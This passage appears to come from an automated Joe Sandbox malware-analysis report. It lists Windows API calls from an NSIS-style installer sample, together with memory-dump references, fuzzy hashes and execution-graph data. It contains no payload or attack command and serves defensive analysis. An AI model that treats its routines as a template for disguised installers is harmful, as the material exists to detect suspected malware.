                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                            • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(0057E8A0), ref: 00402387
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                            • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                            • String ID: !
                                                                                                                                                                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                            • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                            • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                            • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                            • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                            • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                            • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                            • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                            • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                            • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B018,771B23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                            • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                            • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                            • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                            • String ID: Version
                                                                                                                                                                                                                                                                                            • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                            • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                            • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                            • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                            • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                            • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                            • String ID: !N~
                                                                                                                                                                                                                                                                                            • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                            • String ID: Error launching installer
                                                                                                                                                                                                                                                                                            • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                            • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                            • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                            • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 190613189-0

                                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                                            Execution Coverage:3.3%
                                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                            Signature Coverage:3.4%
                                                                                                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                                                                                                            Total number of Limit Nodes:58
102929->102934 102941 c7fe0c 102930->102941 102932 c7fdd2 102931->102932 102933 c3017b 8 API calls 102932->102933 102933->102934 102934->102916 102936 c1c2dc 102935->102936 102940 c1c2d9 __fread_nolock 102935->102940 102937 c3014b 8 API calls 102936->102937 102938 c1c2e7 102937->102938 102939 c3017b 8 API calls 102938->102939 102939->102940 102940->102919 102960 c1bf73 102941->102960 102944 c1bf73 8 API calls 102945 c7fe47 102944->102945 102946 c1bf73 8 API calls 102945->102946 102954 c7fe50 102946->102954 102947 c18577 8 API calls 102947->102954 102948 c80114 102948->102929 102949 c1ad40 8 API calls 102949->102954 102950 c366f8 GetStringTypeW 102950->102954 102952 c36641 39 API calls 102952->102954 102953 c7fe0c 40 API calls 102953->102954 102954->102947 102954->102948 102954->102949 102954->102950 102954->102952 102954->102953 102955 c1bed9 8 API calls 102954->102955 102965 c36722 GetStringTypeW _strftime 102954->102965 102955->102954 102957 c1c2c9 8 API calls 102956->102957 102958 c16569 102957->102958 102958->102922 102959->102928 102961 c3017b 8 API calls 102960->102961 102962 c1bf88 102961->102962 102963 c3014b 8 API calls 102962->102963 102964 c1bf96 102963->102964 102964->102944 102965->102954 102967 c3014b 8 API calls 102966->102967 102968 c1424e 102967->102968 102968->102691 102969->102694 102980 c7e80e 102970->102980 102972 c7de86 CloseHandle 102972->102699 102973 c7ddd4 Process32NextW 102973->102972 102978 c7ddcd 102973->102978 102974 c1bf73 8 API calls 102974->102978 102975 c1b329 8 API calls 102975->102978 102978->102972 102978->102973 102978->102974 102978->102975 102986 c1568e 102978->102986 103028 c17bb5 102978->103028 103037 c2e36b 41 API calls 102978->103037 102981 c7e819 102980->102981 102982 c7e830 102981->102982 102985 c7e836 102981->102985 103038 c36722 GetStringTypeW _strftime 102981->103038 103039 c3666b 39 API calls _strftime 102982->103039 102985->102978 102987 c1bf73 8 API calls 102986->102987 102988 c156a4 102987->102988 102989 c1bf73 8 
